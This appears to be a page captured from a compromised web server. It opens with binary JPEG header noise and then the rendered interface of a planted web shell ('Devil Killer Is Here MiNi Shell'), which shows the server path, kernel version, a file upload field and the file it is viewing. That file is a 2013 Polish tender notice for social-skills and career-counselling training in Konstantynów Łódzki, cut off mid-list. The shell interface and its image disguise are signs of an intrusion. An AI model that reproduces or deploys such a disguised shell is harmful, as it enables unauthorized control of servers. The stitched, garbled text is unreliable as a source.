JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130312/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20130312/98840-N-2013.html

<p class="kh_header"><b>Konstantynów Łódzki: Usługi szkoleniowe na rzecz uczestników projektu  systemowego Siedmiomilowy krok Priorytet VII Promocja integracji społecznej, Działanie 7.1.Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej Programu Operacyjnego Kapitał Ludzki współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.</b><br>
<b>Numer ogłoszenia: 98840 - 2013; data zamieszczenia: 12.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Konstantynowie Łódzkim , ul. Słowackiego 11, 95-050 Konstantynów Łódzki, woj. łódzkie, tel. 0-42 211 19 67, faks 0-42 211 67 43.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mopskonstantynow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi szkoleniowe na rzecz uczestników projektu  systemowego Siedmiomilowy krok Priorytet VII Promocja integracji społecznej, Działanie 7.1.Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej Programu Operacyjnego Kapitał Ludzki współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I :       Warsztaty motywacji umiejętności społecznych i osobistych
Część II:     Doradztwo zawodowe grupowe - warsztaty diagnozy zawodowej oraz poradnictwo indywidualne.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 55.30.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 28.03.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony jeśli Wykonawcza wykaże, że jest wpisany do rejestru instytucji szkoleniowych, prowadzonego przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej zgodnie z art. 20 ust. 1 ustawy z dnia 20 kwietnia 2004 roku o promocji zatrudnienia i instytucjach rynku pracy (tekst jednolity: Dz. U. Nr 69 z 2008r. poz. 415 z późn. zm.).
Wykonawca ubiegający się u wykonanie Części II zamówienia dodatkowo wykaże, że jest wpisany do rejestru podmiotów prowadzących agencje zatrudnienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli: - Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzonej działalności jest krótszy - w tym okresie, wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje, trzy usługi polegające na zorganizowaniu i przeprowadzeniu szkoleń/ warsztatów o tematyce zgodnej z opisem tej części zamówienia, o którą Wykonawca się ubiega, skierowanych do klientów ośrodków pomocy społecznej, powiatowych centrów pomocy rodzinie lub powiatowych urzędów pracy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca zamieści w ofercie wykaz narzędzi potrzebnych do realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami oraz zamieści wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacją na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnego do wykonania zamówienia i wykaże, że prowadziły one w ciągu ostatnich trzech lat trzy szkolenia o podobnej tematyce, skierowane do klientów ośrodków pomocy społecznej, powiatowych centrów pomocy rodzinie lub powiatowych urzędów pracy;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca przedstawi opłacona polisę OC w zakresie prowadzonej działalności, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, z
wiązanej z przedmiotem zamówienia, w okresie wykonywania umowy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Dokument potwierdzający (zaświadczenie, poświadczenie) wpis do rejestru instytucji szkoleniowych  Wojewódzkiego Urzędu Pracy
2.Wykonawcy ubiegający się o część II zamówienia dokument potwierdzający (zaświadczenie, poświadczenie) wpis do rejestru podmiotów prowadzących agencje zatrudnienia.
3.Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych, również wykonywanych usług w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentu potwierdzającego, że te zostały lub są wykonywane należycie. Wykaz wykonanych usług musi być sporządzony według wzoru stanowiącego załącznik nr 3 do SIWZ.
4.Wykaz narzędzi i wykaz osób, które uczestniczyć będą w wykonaniu zamówienia wraz z informacjami na temat ich wykształcenia, doświadczenia zawodowego oraz informacją o podstawie do dysponowania tymi osobami. Wykaz należy sporządzić według wzoru stanowiącego załącznik nr 4 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mopskonstantynów.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Konstantynowie Łódzkim
ul. Słowackiego 11, 95-050 Konstantynów Łódzki.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.03.2013 godzina 10:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Konstantynowie Łódzkim
ul. Słowackiego 11, 95-050 Konstantynów Łódzki.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt  systemowy Siedmiomilowy krok Priorytet VII Promocja integracji społecznej, Działanie 7.1.Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej Programu Operacyjnego Kapitał Ludzki współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Warsztaty motywacji umiejętności społecznych i osobistych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przewidziano do przeszkolenia 33 osób. Szkolenie zostanie sfinansowane w ramach projektu systemowego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Programu Operacyjnego Kapitał Ludzki, Priorytetu VII Promocja integracji społecznej, Działania 7.1. Rozwój i upowszechnianie aktywnej integracji, Poddziałania 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.

Liczba osób i czas trwania szkolenia. W powyższym szkoleniu uczestniczyć będzie łącznie grupa 33 osób. Osoby będą kierowane w dwóch grupach. Szkolenie winno odbyć się w terminie 28 marzec - 21 maj 2013 r. w godzinach rannych,  jeden raz w tygodniu na grupę.

Miejsce szkolenia. Szkolenie  powinno odbywać się na terenie Konstantynowa Łódzkiego. Jest to podyktowane faktem, iż uczestnicy Projektu są mieszkańcami Konstantynowa Łódzkiego i osobami o bardzo niskich dochodach. 

Liczba godzin i program szkolenia. Program zajęć obejmować winien 20 godzin dydaktycznych (godz. dydaktyczna = 45 minut) przeznaczonych dla jednego uczestnika. Zajęcia dla każdej z grup winny odbywać się w godzinach rannych, jeden raz w tygodniu w dni robocze od poniedziałku do piątku, maksymalnie po 4 godziny dydaktyczne dziennie. 

Minimalny zakres tematyczny szkolenia.

 Celem szkolenia jest:
podniesienie samooceny, 
podniesienie umiejętności interpersonalnych i społecznych niezbędnych do podejmowania ról społecznych i zawodowych, 
zwiększenie aktywności własnej, podniesienie wiary w możliwości zmiany swojej sytuacji osobistej i społecznej; 
nabycie rozwój kompetencji społecznych 
komunikacja interpersonalna,
asertywność,
negocjacje,
zorganizowanie w czasie szkolenia zajęć z zakresu aktywnego wypoczynku i radzenia sobie ze stresem (zajęcia w plenerze) w celu dostarczenia praktycznych doświadczeń związanych z realizowanymi tematami i treściami. 

Program zajęć powinien zawierać dodatkowo:
nazwę i zakres szkolenia,
czas trwania i sposób organizacji szkolenia,
cele szkolenia,
plan nauczania określający tematy zajęć oraz ich wymiar,  
treści szkolenia w zakresie poszczególnych zajęć edukacyjnych
wykaz niezbędnych środków i materiałów dydaktycznych,
ankiety ewaluacyjne służące sprawdzaniu efektów szkolenia pod kątem osiąganych
      celów (zaakceptowane przez Zamawiającego).

Trening prowadzony będzie przez mgr psychologii, który okaże Zamawiającemu dyplom z zakresu psychologii i wykaże, że prowadził w ciągu ostatnich trzech lat trzy szkolenia o podobnej tematyce skierowane do klientów ośrodków pomocy społecznej, powiatowych centrów pomocy rodzinie lub powiatowych urzędów pracy.  

Materiały szkoleniowe dla uczestników
Uczestnicy szkolenia winni mieć zapewniony sprzęt, jak również winni otrzymać materiały poświęcone tematyce kursu zaopatrzone w logo UE i POKL oraz notatniki, długopisy, ołówki itp. przybory piśmiennicze. 
W czasie przerw wymagane jest zapewnienie uczestnikom tzw. cateringu: obiadu w postaci jednego gorącego posiłku tj. drugiego dania oraz serwisu kawowego tj. kawy, herbaty, ciastek, zimnych napojów. 

Harmonogram, preliminarz kosztów, zaświadczenia
Do oferty należy przedłożyć harmonogram będący propozycją terminów szkoleń  - załącznik nr 7 do niniejszej Specyfikacji Istotnych Warunków Zamówienia oraz sporządzony przez Wykonawcę szczegółowy program szkolenia, a także jego treści ( załącznik nr 10). Należy przedstawić preliminarz kosztów zawarty na druku stanowiącym załącznik nr 8 do niniejszej Specyfikacji Istotnych Warunków Zamówienia. Preliminarz winien zawierać wszystkie przedstawione na druku pozycje: m. in. ubezpieczenie od następstw nieszczęśliwych wypadków, koszt cateringu, inne koszty.
Wykonawca dodatkowo wyda uczestnikom kursu certyfikaty o jego ukończeniu na druku stanowiącym załącznik nr 9 do niniejszej Specyfikacji Istotnych Warunków Zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 55.30.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 28.03.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Doradztwo zawodowe grupowe - warsztaty diagnozy zawodowej oraz poradnictwo indywidualne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przewidziano do przeszkolenia 33 osoby. Szkolenie zostanie sfinansowane w ramach projektu systemowego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Programu Operacyjnego Kapitał Ludzki, Priorytetu VII Promocja integracji społecznej, Działania 7.1. Rozwój i upowszechnianie aktywnej integracji, Poddziałania 7.1.1 Rozwój i upowzechnianie aktywnej integracji przez ośrodki pomocy społecznej

Liczba osób i czas trwania szkolenia. W powyższym szkoleniu uczestniczyć będzie łącznie grupa 33 osób. Osoby będą kierowane w dwóch grupach. Szkolenie winno odbyć się w terminie 02 kwiecień - 20 maj 2013 r. w godzinach rannych jeden raz w tygodniu na grupę.

Miejsce szkolenia. Szkolenie powinno odbywać się na terenie Konstantynowa Łódzkiego. Jest to podyktowane faktem, iż uczestnicy Projektu są mieszkańcami Konstantynowa Łódzkiego i osobami o bardzo niskich dochodach. 

Liczba godzin i program szkolenia. Program zajęć obejmować winien 16 godzin dydaktycznych grupowych (godz. dydaktyczna = 45 minut) przeznaczonych na uczestnika oraz 2 godziny dydaktyczne konsultacji indywidualnych (godz. dydaktyczna = 45 minut) przeznaczonych na uczestnika. 

Szkolenie obejmuje:
warsztaty grupowe w wymiarze 16 h dydaktycznych przeznaczonych na uczestnika (godz. dydaktyczna = 45 minut). Zajęcia dla każdej z grup winny odbywać się jeden raz w tygodniu w dni robocze od poniedziałku do piątku w godzinach rannych, maksymalnie po 4 godziny dydaktyczne dziennie; 
konsultacje indywidualne w wymiarze 2h dydaktycznych na uczestnika (godz. dydaktyczna = 45 minut) w godzinach rannych dni robocze od poniedziałku do piątku. 

Minimalny zakres tematyczny szkolenia. Celem szkolenia jest pomoc w zidentyfikowaniu przez uczestników swoich mocnych stron, umiejętności i kwalifikacji przydatnych do wykonywania pracy oraz podniesienie o umiejętności praktycznych w zakresie wypełniania formularzy aplikacyjnych, przygotowywania dokumentów aplikacyjnych (CV i list motywacyjny) przez uczestników projektu.

Zakres tematyczny szkolenia doradztwa grupowego - warsztaty diagnozy zawodowej powinien obejmować: 
- planowanie i podejmowanie decyzji dot. pracy i edukacji.
- sposoby poszukiwania pracy,
- sposoby kontaktowania się z pracodawcą
- warunki ekonomiczne określonych prac i zawodów
- przygotowywanie formularzy dokumentów aplikacyjnych (cv, list motywacyjny).

Zakres tematyczny szkolenia poradnictwo indywidualne powinien obejmować: 
- analiza predyspozycji, umiejętności i kompetencji zawodowych,
- analiza dotychczasowej edukacji oraz doświadczenia zawodowego,
- ustalenie preferencji dotyczących rodzaju i charakteru poszukiwanej pracy
- ustalanie luk kompetencyjnych,
- wskazanie kursów i szkoleń uzupełniających kompetencje zawodowe i osobiste,
- wskazanie możliwych kierunków rozwoju kariery zawodowej,
- opracowanie Indywidualnego Planu Działania. 

Program zajęć powinien zawierać dodatkowo:
nazwę i zakres szkolenia,
czas trwania i sposób organizacji szkolenia,
cele szkolenia,
plan nauczania określający tematy zajęć oraz ich wymiar,  
treści szkolenia w zakresie poszczególnych zajęć edukacyjnych
wykaz niezbędnych środków i materiałów dydaktycznych,
